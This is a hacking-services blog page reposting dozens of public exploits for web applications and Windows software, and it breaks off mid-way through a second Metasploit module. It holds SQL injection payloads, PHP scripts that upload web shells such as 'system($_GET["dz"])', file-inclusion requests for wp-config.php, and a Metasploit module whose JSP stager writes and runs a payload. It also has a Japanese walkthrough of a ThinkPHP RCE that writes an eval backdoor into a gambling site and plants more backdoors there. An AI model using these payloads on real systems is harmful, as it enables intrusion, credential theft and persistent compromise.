Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863117827

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/64332/info

B2B Vertical Marketplace Creator is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.

An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.

B2B Vertical Marketplace Creator 2.0 is vulnerable; other version may also be vulnerable. 

www.example.com/demo/B2BVerticalMarketplace/admin.asp

UserID : 1' or '1' = '1
Password : 1' or '1' = '1
HireHackking 
********************************************************************************************
# Exploit: WinAsm Studio 5.1.8.8 BOF. 
# Date: 12/6/2015
# Exploit Author: Un_N0n
# Vendor: WinAsm
# Software Link: http://www.winasm.net/winasm-studio-updates.html
# Version: 5.1.8.8
# Tested on: Windows 7 x64(64bit)
********************************************************************************************
[Info]

Code: 
rc.right = 0;
rc.bottom = 0;
  DrawTextExA(
    hdc,
    L"I \t\u6e69\u6c63\u6475e\u6e69\.................\uf64)", <--- XXXtremely big string to draw, thus crashes.
    1,
    &rc,
    0x2CE0u,
    &dtp);
*(_DWORD *)(a1 + 420) = rc.right;


[How to?]
1 - Open up WinAsm.exe.
2 - GoTo Files -> Open Files.
3 - Browser the crash.txt in it.
~ Software will Crash.

[crash.txt?]
file = open('crash.txt','w')
file.write("A"*20000)       #Crash.txt Contains 20000s As
file.close()

********************************************************************************************
HireHackking 
source: https://www.securityfocus.com/bid/64329/info
 
EtoShop C2C Forward Auction Creator is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
 
An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
 
EtoShop C2C Forward Auction Creator 2.0; other version may also be vulnerable. 

www.example.com/demo/C2CForwardAuction/auction/casp/admin.asp

UserID : x' or ' 1=1--
Password : x' or ' 1=1--
HireHackking 
source: https://www.securityfocus.com/bid/64307/info

osCMax is prone to an arbitrary file-upload vulnerability and an information-disclosure vulnerability .

Attackers can exploit these issues to obtain sensitive information and upload arbitrary files. This may aid in other attacks.

osCMax 2.5.3 is vulnerable; other versions may also be affected. 

<?php
#-----------------------------------------------------------------------------
$headers = array("Content-Type: application/octet-stream",
"Content-Disposition: form-data; name=\"Filedata\"; filename=\"shell.php\"");
#-----------------------------------------------------------------------------
$shell="<?php phpinfo(); ?>"; # U'r Sh3lL h3re !
$path ="/temp/"; # Sh3lL Path 
#-----------------------------------------------------------------------------
$ch = curl_init("http://www.example.com//oxmax/admin/includes/javascript/ckeditor/filemanager/swfupload/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, 
  array('Filedata'=>"@$shell",
        'uploadpath'=>"@$path"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
#-----------------------------------------------------------------------------
?>
HireHackking 
source: https://www.securityfocus.com/bid/64329/info

EtoShop C2C Forward Auction Creator is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.

An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.

EtoShop C2C Forward Auction Creator 2.0; other version may also be vulnerable. 

http://www.example.com/C2CForwardAuction/auction/asp/list.asp?pa=[SQL INJECTION]
HireHackking 
source: https://www.securityfocus.com/bid/64278/info

BoastMachine is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://example.com/user.php
(POST - blog)
blog='+(SELECT 1 FROM (SELECT SLEEP(25))A)+'
HireHackking 
source: https://www.securityfocus.com/bid/64255/info

eduTrac is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.

A remote attacker could exploit the vulnerability using directory-traversal characters ('../') to access arbitrary files that contain sensitive information. Information harvested may aid in launching further attacks.

eduTrac 1.1.1 is vulnerable; other versions may also be affected.

http://www.example.com/installer/overview.php?step=writeconfig&showmask=../../eduTrac/Config/constants.php
HireHackking 
source: https://www.securityfocus.com/bid/64173/info

The PhotoSmash Galleries plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because it fails to properly validate file extensions before uploading them.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 

<?php
$uploadfile="file.php";
$ch = curl_init("
http://www.example.com/wordpress/wp-content/plugins/photosmash-galleries/bwbps-uploader.php
");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('FileData'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
HireHackking 
source: https://www.securityfocus.com/bid/64167/info

WordPress Easy Career Openings plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/career-details/?jobid=3'[Sql Injection]
HireHackking 
# Author: loneferret of Offensive Security
# Product: Cyclope Employee Surveillance Solution (again)
# Version: <= 6.8.1 
# Vendor Site: http://www.cyclope-series.com/
# Software Download: http://www.cyclope-series.com/download/index.html
# Link: http://www.cyclope-series.com/setups/setup.exe
 
# Software description:
# The employee monitoring software developed by Cyclope-Series is specially designed to inform 
# and equip management with statistics relating to the productivity of staff within their organization. 
 
# Vulnerability:
# Due to insecure file Permissions, a low privileged could potentially 
# delete, modify or replace many of the key executable files used, and needed
# by the software.

# Although I haven't checked older versions, I do recall seeing the same file
# permissions being set. Making this software extremely prone to lots of fun stuff.

''' File Information '''
A few files with odd-ball permission. Keep in mind all files are like this.
All files in c:\xampplite, as well as  in Program Files.
The "CyclopeClient.exe" is is what is pushed to workstation in order to monitor
employees. As we can see, this file's permission is set to "Everybody". So is the
uninstaller executable.

So gain access to the system, and as a low privileged user one can
easily replace httpd.exe or mysqld.exe, with an evil EXE file.
Next time that file is executed, you'll get your shell as SYSTEM.
Although they'll be out of a service...bummer


# C:\xampplite\mysql\bin>icacls mysqld.exe
# mysqld.exe BUILTIN\Administrators:(I)(F)
#            NT AUTHORITY\SYSTEM:(I)(F)
#            BUILTIN\Users:(I)(RX)
#            NT AUTHORITY\Authenticated Users:(I)(M)
# 
# Successfully processed 1 files; Failed processing 0 files
----

# C:\xampplite\apache\bin>icacls httpd.exe
# httpd.exe BUILTIN\Administrators:(I)(F)
#           NT AUTHORITY\SYSTEM:(I)(F)
#           BUILTIN\Users:(I)(RX)
#           NT AUTHORITY\Authenticated Users:(I)(M)
# 
# Successfully processed 1 files; Failed processing 0 files
----

# C:\xampplite\mysql\bin>icacls mysql.exe
# mysql.exe BUILTIN\Administrators:(I)(F)
#           NT AUTHORITY\SYSTEM:(I)(F)
#           BUILTIN\Users:(I)(RX)
#           NT AUTHORITY\Authenticated Users:(I)(M)
# 
# Successfully processed 1 files; Failed processing 0 files
----

# C:\Program Files\Cyclope\Client>icacls CyclopeClient.exe
# CyclopeClient.exe Everyone:(F)
# 
# Successfully processed 1 files; Failed processing 0 files
----

# C:\Program Files\Cyclope>icacls unins000.exe
# unins000.exe Everyone:(F)
# 
# Successfully processed 1 files; Failed processing 0 files
..
..
etc..
..
..
Way too many files to list, essentially whatever this thing installs it's up for grabs.
HireHackking 
###########################################
#-----------------------------------------#
#[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]#
#-----------------------------------------#
#     *----------------------------*      #
#  K  |....##...##..####...####....|  .   #
#  h  |....#...#........#..#...#...|  A   #
#  a  |....#..#.........#..#....#..|  N   #
#  l  |....###........##...#.....#.|  S   #
#  E  |....#.#..........#..#....#..|  e   #
#  D  |....#..#.........#..#...#...|  u   #
#  .  |....##..##...####...####....|  r   #
#     *----------------------------*      #
#-----------------------------------------#
#[ Copyright (c) 2015 | Dz Offenders Cr3w]#
#-----------------------------------------#
###########################################
# >>    D_x . Made In Algeria . x_Z    << #
###########################################
#
# [>] Title : Wordpress Plugin TheCartPress v1.4.7 Multiple Vulnerabilities
#
# [>] Author : KedAns-Dz
# [+] E-mail : ked-h (@hotmail.com)
# [+] FaCeb0ok : fb.me/K3d.Dz
# [+] TwiTter : @kedans
#
# [#] Platform : PHP / WebApp
# [+] Cat/Tag : Multiple
#
# [<] <3 <3 Greetings t0 Palestine <3 <3
# [!] Vendor : http://thecartpress.com
#
###########################################
#
# [!] Description :
#
# Wordpress plugin TheCartPress v1.4.7 is suffer from multiple vulnerabilities
# remote attacker can disclosure some local files or do a remote code execution.
#
####

// page : Miranda.class.php
// lines : 111.. 115

/* --[1] Local File Include -- */
<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://[target].com/wp-content/plugins/thecartpress/modules/Miranda.class.php?page=../../../../../../../../wp-config.php%00");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>

/* --[2] Remote Code Execution -- */
<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://[target].com/wp/admin-ajax.php?action=tcp_miranda_save_admin_panel&class=[RCE]");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>

####
#  <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !>
#  Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3
#---------------------------------------------------------------
# Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 , 
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz  , &
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &
# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & 
# PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ;
####
HireHackking 
###########################################
#-----------------------------------------#
#[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]#
#-----------------------------------------#
#     *----------------------------*      #
#  K  |....##...##..####...####....|  .   #
#  h  |....#...#........#..#...#...|  A   #
#  a  |....#..#.........#..#....#..|  N   #
#  l  |....###........##...#.....#.|  S   #
#  E  |....#.#..........#..#....#..|  e   #
#  D  |....#..#.........#..#...#...|  u   #
#  .  |....##..##...####...####....|  r   #
#     *----------------------------*      #
#-----------------------------------------#
#[ Copyright (c) 2015 | Dz Offenders Cr3w]#
#-----------------------------------------#
###########################################
# >>    D_x . Made In Algeria . x_Z    << #
###########################################
#
# [>] Title : Wordpress Plugin Sell Download v1.0.16 Local File Disclosure Vulnerability
#
# [>] Author : KedAns-Dz
# [+] E-mail : ked-h (@hotmail.com)
# [+] FaCeb0ok : fb.me/K3d.Dz
# [+] TwiTter : @kedans
#
# [#] Platform : PHP / WebApp
# [+] Cat/Tag : File Disclosure
#
# [<] <3 <3 Greetings t0 Palestine <3 <3
# [!] Vendor : http://wordpress.dwbooster.com/content-tools/sell-downloads
#
###########################################
#
# [!] Description :
#
# Wordpress plugin Sell Download v1.0.16 is suffer from Local File Disclosure Vulnerability
# remote attacker can disclosure some local files.
#
####

<?php
// page : sell-downloads.php
// lines : 119, 130.. 131

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://[target].com/wp-content/plugins/sell-downloads/sell-downloads.php?file=../../../../../../../../.././wp-config.php%00");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>

####
#  <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !>
#  Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3
#---------------------------------------------------------------
# Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 , 
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz  , &
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &
# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & 
# PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ;
####
HireHackking 
###########################################
#-----------------------------------------#
#[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]#
#-----------------------------------------#
#     *----------------------------*      #
#  K  |....##...##..####...####....|  .   #
#  h  |....#...#........#..#...#...|  A   #
#  a  |....#..#.........#..#....#..|  N   #
#  l  |....###........##...#.....#.|  S   #
#  E  |....#.#..........#..#....#..|  e   #
#  D  |....#..#.........#..#...#...|  u   #
#  .  |....##..##...####...####....|  r   #
#     *----------------------------*      #
#-----------------------------------------#
#[ Copyright (c) 2015 | Dz Offenders Cr3w]#
#-----------------------------------------#
###########################################
# >>    D_x . Made In Algeria . x_Z    << #
###########################################
#
# [>] Title : Wordpress Plugin Advanced uploader v2.10 Multiple Vulnerabilities
#
# [>] Author : KedAns-Dz
# [+] E-mail : ked-h (@hotmail.com)
# [+] FaCeb0ok : fb.me/K3d.Dz
# [+] TwiTter : @kedans
#
# [#] Platform : PHP / WebApp
# [+] Cat/Tag : File Upload / Code Exec / Disclosure
#
# [<] <3 <3 Greetings t0 Palestine <3 <3
# [!] Vendor : http://www.wordpress.org
#
###########################################
#
# [!] Description :
#
# Wordpress plugin Advanced uploader v2.10 is suffer from multiple vulnerabilities
# remote attacker can upload file/shell/backdoor and exec commands or disclosure some local files.
#
####

<?php
// page : upload.php
// lines : 1030... 1037

$postData = array();
$postData['file'] = "@k3d.php";
/* k3d.php : <?php system($_GET["dz"]); ?> */
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http:/[target].com/wp-content/plugins/advanced-uploader/upload.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData );
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>

##################

<?php
// page : upload.php
// lines : 1219... 1237

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$[target].com/wp-content/plugins/advanced-uploader/upload.php?destinations=../../../../../../../../../wp-config.php%00");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>

####
#  <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !>
#  Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3
#---------------------------------------------------------------
# Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 , 
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz  , &
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &
# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & 
# PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ;
####
HireHackking 
source: https://www.securityfocus.com/bid/64112/info
  
NeoBill is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
  
An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands, to execute local script code in the context of the application, the attacker may be able to obtain sensitive information that may aid in further attacks.
  
NeoBill 0.9-alpha is vulnerable; other versions may also be affected. 

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://[target]/install/index.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, "language=[LFI]%00"); // LFI 1
curl_setopt($ch, CURLOPT_COOKIE, "language=[LFI]%00"); // LFI 2 ( via cookie ^^ )
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_[target]");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
HireHackking

0x01ターゲットを決定

メインサイト:

1049983-20220106104330681-1405261208.png

サイド:

1049983-20220106104331327-1747311994.png

0x02脆弱性エクスプロイト

情報収集により、TP V5.0.9であることがわかりました。このバージョンにはTP-RCEの脆弱性があります。

1049983-20220106104331825-1027593284.png

ペイロードを介して直接テストします。

投稿:_method=__ constructfilter []=assertmethod=getGet []=phpinfo()

ペイロードを見つけて直接入力します。

投稿:_method=__ constructfilter []=assertmethod=getGet []=phpinfo()

1049983-20220106104332260-1610753114.png

Php 5.4.45からのものであることがわかりました。

ゲッシェルを直接試してみてください:

1049983-20220106104332691-319550220.png

システムが無効になっていることがわかっており、他のシステムコマンドを試してみると同じことが言えます。

1049983-20220106104333144-1922570488.png

phpinfoのdesable_functionsが無効になっている機能を確認してください。

1049983-20220106104333540-1301638445.png

バイパスして馬を書く方法を見つけます(私はここで長い間立ち往生しています)

最後に、侵入の友人を通して、私はfile_put_contentsを使用してシェルを直接書き込むことができる次のものを思いつきました。長い間考えていた後、私は他の機能を使用して馬を直接書くことを忘れていました。システムコマンドを使用して馬を書く必要はありませんが、根本的な知識はまだ弱いです。ありがとうございました!

1049983-20220106104333995-1796623647.png

0x03 getShell

コンストラクトペイロード:

_method=__ constructfilter []=assertmethod=getGet []=file_put_contents( 'a.php'、 '?php eval($ _ post [a])?')

1049983-20220106104334533-47908496.png

文章は成功し、包丁に関連しています。

1049983-20220106104334965-571720133.png

正常に接続されています。

許可を表示:

1049983-20220106104335330-28763533.png

リモートセキュリティモードがアクティブになっていることがわかりました。

バイパスしたい場合、多くの機能が無効になり、アカウントが成功していないことがわかります。

ソースコードをダウンロード:

1049983-20220106104335675-327281683.png

削除を防ぐために、より多くのバックドアを展開します。

0x04要約

1。BC Webサイトを開き、ボトムバージョンの情報を通じて、サイトフレームワークはTP V5.0.9であり、RCEの脆弱性があることがわかりました。

投稿:_method=__ constructfilter []=assertmethod=getGet []=phpinfo()

2。PHP5.4.45バージョンであることがわかりました。コマンドを直接実行しようとすると、システム機能とシステムコマンドを実行する関数も無効になっていることがわかりました。

投稿:_method=__ constructfilter []=assertmethod=getGet []=whoai

3.システムコマンド関数は無効ですが、File_put_Contentsを使用してシェルを直接書き込み、バイパスできます。

4。getShellを入手してください

ペイロードを構築します:

_method=__ constructfilter []=assertmethod=getGet []=file_put_contents( 'a.php'、 '?php eval($ _ post [a])?')

5.正常に書き込み、包丁に接続します

出典:https://xz.aliyun.com/t/9232

HireHackking 
source: https://www.securityfocus.com/bid/64112/info
 
NeoBill is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
 
An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands, to execute local script code in the context of the application, the attacker may be able to obtain sensitive information that may aid in further attacks.
 
NeoBill 0.9-alpha is vulnerable; other versions may also be affected. 

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://[target]/install/include/solidstate.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_POSTFIELDS, "username='[SQLi]&firstname='[SQLi]&email='[SQLi]"); // or inject in only one ;)
curl_setopt($ch, CURLOPT_COOKIE, "language='[SQLi]"); // SQLi via Cookie
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_[target]"); // add cookie-jar header to exploit it ^^
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
HireHackking 
source: https://www.securityfocus.com/bid/64112/info

NeoBill is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.

An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands, to execute local script code in the context of the application, the attacker may be able to obtain sensitive information that may aid in further attacks.

NeoBill 0.9-alpha is vulnerable; other versions may also be affected. 

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://[target]/modules/nullregistrar/phpwhois/example.php?query=[CMD]");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
HireHackking 
source: https://www.securityfocus.com/bid/64110/info

Enorth Webpublisher is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input.

A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

POST /pub/m_worklog/log_searchday.jsp HTTP/1.1
Host: www.example.com
User-Agent:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
Cookie:
Pragma: no-cache
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 180
thisday=20131012') and UTL_INADDR.get_host_name((select v from (select rownum,USER_NAME||chr(94)||PASS_WORD v from TN_USER WHERE USER_ID=1) where rownum=1))>0--&cx.y=16&querytype=
HireHackking 
Advisory ID: HTB23275
Product: Gwolle Guestbook WordPress Plugin
Vendor: Marcel Pol
Vulnerable Version(s): 1.5.3 and probably prior
Tested Version: 1.5.3
Advisory Publication:  October 14, 2015  [without technical details]
Vendor Notification: October 14, 2015 
Vendor Patch: October 16, 2015 
Public Disclosure: November 4, 2015 
Vulnerability Type: PHP File Inclusion [CWE-98]
CVE Reference: CVE-2015-8351
Risk Level: Critical 
CVSSv3 Base Score: 9.0 [CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered a critical Remote File Inclusion (RFI) in Gwolle Guestbook WordPress plugin, which can be exploited by non-authenticated attacker to include remote PHP file and execute arbitrary code on the vulnerable system.  

HTTP GET parameter "abspath" is not being properly sanitized before being used in PHP require() function. A remote attacker can include a file named 'wp-load.php' from arbitrary remote server and execute its content on the vulnerable web server. In order to do so the attacker needs to place a malicious 'wp-load.php' file into his server document root and includes server's URL into request:

http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://[hackers_website]

In order to exploit this vulnerability 'allow_url_include' shall be set to 1. Otherwise, attacker may still include local files and also execute arbitrary code. 

Successful exploitation of this vulnerability will lead to entire WordPress installation compromise, and may even lead to the entire web server compromise. 


-----------------------------------------------------------------------------------------------

Solution:

Update to Gwolle Guestbook 1.5.4

More Information:
https://wordpress.org/plugins/gwolle-gb/changelog/

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23275 - https://www.htbridge.com/advisory/HTB23275 - PHP File Inclusion in Gwolle Guestbook WordPress Plugin.
[2] Gwolle Guestbook WordPress Plugin - https://wordpress.org/plugins/gwolle-gb/ - Gwolle Guestbook is the WordPress guestbook you've just been looking for.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Oracle BeeHive 2 voice-servlet prepareAudioToPlay() Arbitrary File Upload",
      'Description'    => %q{
        This module exploits a vulnerability found in Oracle BeeHive. The prepareAudioToPlay method
        found in voice-servlet can be abused to write a malicious file onto the target machine, and
        gain remote arbitrary code execution under the context of SYSTEM. Authentication is not
        required to exploit this vulnerability.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'mr_me <steventhomasseeley[at]gmail.com>', # Source Incite. Vulnerability discovery, PoC
          'sinn3r'                                  # MSF module
        ],
      'References'     =>
        [
          [ 'ZDI', '15-550'],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html' ]
        ],
      'DefaultOptions'  =>
        {
          'RPORT'    => 7777
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Oracle Beehive 2', {}]
        ],
      'Privileged'     => true,
      'DisclosureDate' => "Nov 10 2015",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "Oracle Beehive's base directory", '/'])
      ], self.class)
  end


  def check
    res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa/'))

    if res.nil?
      vprint_error("Connection timed out.")
      return Exploit::CheckCode::Unknown
    elsif res && (res.code == 403 || res.code == 200)
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end


  def exploit
    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::NotVulnerable, 'Target does not have voice-servlet')
    end

    # Init some names
    # We will upload to:
    # C:\oracle\product\2.0.1.0.0\beehive_2\j2ee\BEEAPP\applications\voice-servlet\prompt-qa\
    exe_name = "#{Rex::Text.rand_text_alpha(5)}.exe"
    stager_name = "#{Rex::Text.rand_text_alpha(5)}.jsp"
    print_status("Stager name is: #{stager_name}")
    print_status("Executable name is: #{exe_name}")
    register_files_for_cleanup("../BEEAPP/applications/voice-servlet/voice-servlet/prompt-qa/#{stager_name}")

    # Ok fire!
    print_status("Uploading stager...")
    res = upload_stager(stager_name, exe_name)

    # Hmm if we fail to upload the stager, no point to continue.
    unless res
      fail_with(Failure::Unknown, 'Connection timed out.')
    end

    print_status("Uploading payload...")
    upload_payload(stager_name)
  end

  # Our stager is basically a backdoor that allows us to upload an executable with a POST request.
  def get_jsp_stager(exe_name)
    jsp = %Q|<%@ page import="java.io.*" %>
<%
  ByteArrayOutputStream buf = new ByteArrayOutputStream();
  BufferedReader reader = request.getReader();
  int tmp;
  while ((tmp = reader.read()) != -1) { buf.write(tmp); }
  FileOutputStream fostream = new FileOutputStream("#{exe_name}");
  buf.writeTo(fostream);
  fostream.close();
  Runtime.getRuntime().exec("#{exe_name}");
%>|

    # Since we're sending it as a GET request, we want to keep it smaller so
    # we gsub stuff we don't want.
    jsp.gsub!("\n", '')
    jsp.gsub!('  ', ' ')
    Rex::Text.uri_encode(jsp)
  end


  def upload_stager(stager_name, exe_name)
    # wavfile = Has to be longer than 4 bytes (otherwise you hit a java bug)

    jsp_stager = get_jsp_stager(exe_name)
    uri = normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', 'playAudioFile.jsp')
    send_request_cgi({
      'method'        => 'POST',
      'uri'           => uri,
      'encode_params' => false, # Don't encode %00 for us
      'vars_post'    => {
        'sess'       => "..\\#{stager_name}%00",
        'recxml'     => jsp_stager,
        'audiopath'  => Rex::Text.rand_text_alpha(1),
        'wavfile'    => "#{Rex::Text.rand_text_alpha(5)}.wav",
        'evaluation' => Rex::Text.rand_text_alpha(1)
      }
    })
  end

  def upload_payload(stager_name)
    uri = normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', stager_name)
    send_request_cgi({
      'method' => 'POST',
      'uri'    => uri,
      'data'   => generate_payload_exe(code: payload.encoded)
    })
  end

  def print_status(msg)
    super("#{rhost}:#{rport} - #{msg}")
  end

end
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
